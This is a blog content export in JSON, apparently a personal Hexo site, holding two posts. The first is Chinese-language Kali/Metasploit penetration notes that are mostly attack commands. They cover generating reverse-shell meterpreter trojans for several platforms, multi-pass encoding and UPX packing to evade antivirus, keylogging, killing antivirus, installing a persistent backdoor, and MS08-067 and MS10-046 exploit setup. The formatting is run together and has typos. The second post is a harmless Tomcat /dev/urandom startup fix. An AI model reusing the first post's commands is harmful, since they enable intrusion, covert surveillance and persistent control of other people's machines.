content.json
{"meta":{"title":"若兮相言","subtitle":"先栽树后乘凉","description":null,"author":"Rxxy","url":"https://rxxy.github.io"},"pages":[{"title":"","date":"2017-08-28T02:33:19.024Z","updated":"2017-08-28T02:33:19.024Z","comments":false,"path":"tags/index.html","permalink":"https://rxxy.github.io/tags/index.html","excerpt":"","text":""}],"posts":[{"title":"kali渗透笔记","slug":"kali渗透笔记","date":"2016-12-26T15:45:39.380Z","updated":"2017-08-28T01:23:24.868Z","comments":true,"path":"2016/12/26/cj6vqjyyc0002a8tws5j9r869/","link":"","permalink":"https://rxxy.github.io/2016/12/26/cj6vqjyyc0002a8tws5j9r869/","excerpt":"","text":"#kali渗透笔记 Windows shellCode usege/root生成木马hello.exe Lhost本机ip Lpost回连端口 windows/meterpreter/reverse_tcp LHOST=192.168.159.128LPORT=1211 X或E >hello.exe12345678910111213msf > use exploit/multi/handlermsf exploit(handler) > set payloadwindows/meterpreter/reverse_tcppayload=> windows/meterpreter/reverse_tcpmsfexploit(handler) > set LHOST 192.168.159.128LHOST=> 192.168.159.128msf exploit(handler) > set LPORT1211LPORT => 1211msf exploit(handler) > exploit``` 开始侦听,在目标端运行木马即可获取shell ##### linux下攻击载荷```msfpayloadlinux/x86/meterpreter/rverse_tcp LHOST=192.168.159.128 LPORT=1212 X >hello.shmsf exploit(handler) > set payloadlinux/x86/meterpreter/reverse_tcppayload =>linux/x86/meterpreter/reverse_tcp java下攻击载荷java/meterpreter/reverse_tcp LHOST=192.168.159.128 LPORT=1212 X >hello.jar```123 ##### php下攻击载荷```msfpayloadphp/meterpreter/reverse_tcp LHOST=192.168.159.128LPORT=1212 R > 123.php Android下攻击载荷1msfpayloadandroid/meterpreter/reverse_tcp LHOST=192.168.159.128 LPORT=7777 R> /root/hello.apk shellCode免杀多重编码免杀(弱):windows/meterpreter/rverse_tcpLHOST=192.168.159.128 LPORT=1212 R|Msfencode -ex86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw |msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5-t exe -o1 -o /root/hello.exe 加壳Upx -5hello.exe meterpreter基本命令 screenshot截屏sysinfo系统信息ps查看进程migrate 1323切换进程(使木马寄存在其他进程上)Run 
post/windows/capture/keylog_recorder记录键盘输入 持久控制run post/windows/manage/migrate自动切换进程run killav 关闭正在运行的cmd服务器安装后门run metsvc -A 安装后门使用后门:use exploit/multi/handlerset payloadwindows/metsvc_bind_tcpset RHOST 192.168.159.1set LPORT 31337exploit 漏洞利用:Ms10-046useexploit/windows/browser/ms10_046_shortcut_icon_dllloaderSRVHOST LHOST 设置为本机ipPayload: set payload windows/shell/reverse_tcp Ms08-067set payloadwindows/meterpreter/reverse_tcpRHOSTLHOST Targets: 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows 2003 SP0 Universal 4 Windows XP SP2 English (AlwaysOn NX) 5 Windows XP SP2 English (NX) 6 Windows XP SP3 English (AlwaysOn NX) 7 Windows XP SP3 English (NX) 8 Windows XP SP2 Arabic (NX) 9 Windows XP SP2 Chinese - Traditional / Taiwan (NX) 10 Windows XP SP2 Chinese - Simplified (NX) 11 Windows XP SP2 Chinese - Traditional (NX) 12 Windows XP SP2 Czech (NX) 13 Windows XP SP2 Danish (NX) 14 Windows XP SP2 German (NX) 15 Windows XP SP2 Greek (NX) 16 Windows XP SP2 Spanish (NX) 17 Windows XP SP2 Finnish (NX) 18 Windows XP SP2 French (NX) 19 Windows XP SP2 Hebrew (NX) 20 Windows XP SP2 Hungarian (NX) 21 Windows XP SP2 Italian (NX) 22 Windows XP SP2 Japanese (NX) 23 Windows XP SP2 Korean (NX) 24 Windows XP SP2 Dutch (NX) 25 Windows XP SP2 Norwegian (NX) 26 Windows XP SP2 Polish (NX) 27 Windows XP SP2 Portuguese - Brazilian (NX) 28 Windows XP SP2 Portuguese (NX) 29 Windows XP SP2 Russian (NX) 30 Windows XP SP2 Swedish (NX) 31 Windows XP SP2 Turkish (NX) 32 Windows XP SP3 Arabic (NX) 33 Windows XP SP3 Chinese - Traditional / Taiwan (NX) 34 Windows XP SP3 Chinese - Simplified (NX) 35 Windows XP SP3 Chinese - Traditional (NX) 36 Windows XP SP3 Czech (NX) 37 Windows XP SP3 Danish (NX) 38 Windows XP SP3 German (NX) 39 Windows XP SP3 Greek (NX) 40 Windows XP SP3 Spanish (NX) 41 Windows XP SP3 Finnish (NX) 42 Windows XP SP3 French (NX) 43 Windows XP SP3 Hebrew (NX) 44 Windows XP SP3 Hungarian (NX) 45 Windows XP SP3 Italian (NX) 46 Windows XP SP3 
Japanese (NX) 47 Windows XP SP3 Korean (NX) 48 Windows XP SP3 Dutch (NX) 49 Windows XP SP3 Norwegian (NX) 50 Windows XP SP3 Polish (NX) 51 Windows XP SP3 Portuguese - Brazilian (NX) 52 Windows XP SP3 Portuguese (NX) 53 Windows XP SP3 Russian (NX) 54 Windows XP SP3 Swedish (NX) 55 Windows XP SP3 Turkish (NX) 56 Windows 2003 SP1 English (NO NX) 57 Windows 2003 SP1 English (NX) 58 Windows 2003 SP1 Japanese (NO NX) 59 Windows 2003 SP1 Spanish (NO NX) 60 Windows 2003 SP1 Spanish (NX) 61 Windows 2003 SP2 English (NO NX) 62 Windows 2003 SP2 English (NX) 63 Windows 2003 SP2 German (NO NX) 64 Windows 2003 SP2 German (NX) 65 Windows 2003 SP2 Portuguese - Brazilian (NX) 66 Windows 2003 SP2 Spanish (NO NX) 67 Windows 2003 SP2 Spanish (NX) 68 Windows 2003 SP2 Japanese (NO NX)","categories":[],"tags":[{"name":"kali","slug":"kali","permalink":"https://rxxy.github.io/tags/kali/"},{"name":"渗透","slug":"渗透","permalink":"https://rxxy.github.io/tags/渗透/"}],"keywords":[]},{"title":"Tomcat 启动卡在部署项目时(linux)","slug":"Tomcat 启动卡在部署项目时(linux)","date":"2016-11-14T12:26:58.817Z","updated":"2017-08-28T01:23:51.196Z","comments":true,"path":"2016/11/14/cj6vqjyy20000a8twio19d6ht/","link":"","permalink":"https://rxxy.github.io/2016/11/14/cj6vqjyy20000a8twio19d6ht/","excerpt":"","text":"#Tomcat 启动卡在部署项目时(linux) 找到1```securerandom.source=file:/dev/./urandom 这时候根据修改内容就可以查到因为此原因不仅可以造成tomcat卡住,也会造成weblogic启动缓慢,linux或者部分unix系统提供随机数设备是/dev/random和/dev/urandom,两个有区别,urandom安全性没有random高,但random需要时间间隔生成随机数。jdk默认调用random。再后来,终于在weblogic的官方文档中 Monitoring and Troubleshooting 找到了 Avoiding JVM Delays Caused ByRandom Number Generation 这样一个标题。摘录如下: The library used for randomnumber generation in Sun’s JVM relies on /dev/random by default for UNIXplatforms. This can potentially block the Oracle WebLogic CommunicationServices process because on some operating systems /dev/random waits for acertain amount of “noise” to be generated on the host machine beforereturning a result. 
Although /dev/random is more secure, Oracle recommendsusing /dev/urandom if the default JVM configuration delays Oracle WebLogicCommunication Services startup. To determine if your operatingsystem exhibits this behavior, try displaying a portion of the file from ashell prompt: head -n 1 /dev/randomOpen the$JAVA_HOME/jre/lib/security/java.security file in a text editor. Change the line: securerandom.source=file:/dev/randomto read: securerandom.source=file:/dev/urandomSave your change and exit thetext editor.其中说到:可通过 head -n 1 /devrandom 查看是否你的系统会出现伪随机数提供等待。OK就这个,试了一下,果然,在服务器第一次启动后,这个可以快速提供一个值,但当再次调用时发生等待。 解决办法: 永久:oracle 说修改$JAVA_HOME/jre/lib/security/java.security文件,替换securerandom.source=file:/dev/random为securerandom.source=file:/dev/urandom。对所有使用JVM的应用生效。(这个永久的方法,这里面有个问题,就是设置时候实际应该设置为securerandom.source=file:/dev/./urandom,否则不生效) DOMAIN临时:修改startWeblogic.sh文件,JAVA_OPTIONS=”${SAVE_JAVA_OPTIONS}-Djava.security.egd=file:/dev/./urandom” 后继的SecureRandom 测试学习 编写JAVA类如下,运行测试,第一次正常,第二次等待,重启服务器后第一次又正常。启动加入参数-Djava.security.egd=file:/dev/./urandom 正常 来自[http://blog.csdn.net/njchenyi/article/details/46641141](http://blog.csdn.net/njchenyi/article/details/46641141) 原文地址:http://blog.csdn.net/njchenyi/article/details/46641141","categories":[],"tags":[{"name":"linux","slug":"linux","permalink":"https://rxxy.github.io/tags/linux/"},{"name":"tomcat","slug":"tomcat","permalink":"https://rxxy.github.io/tags/tomcat/"}],"keywords":[]}]}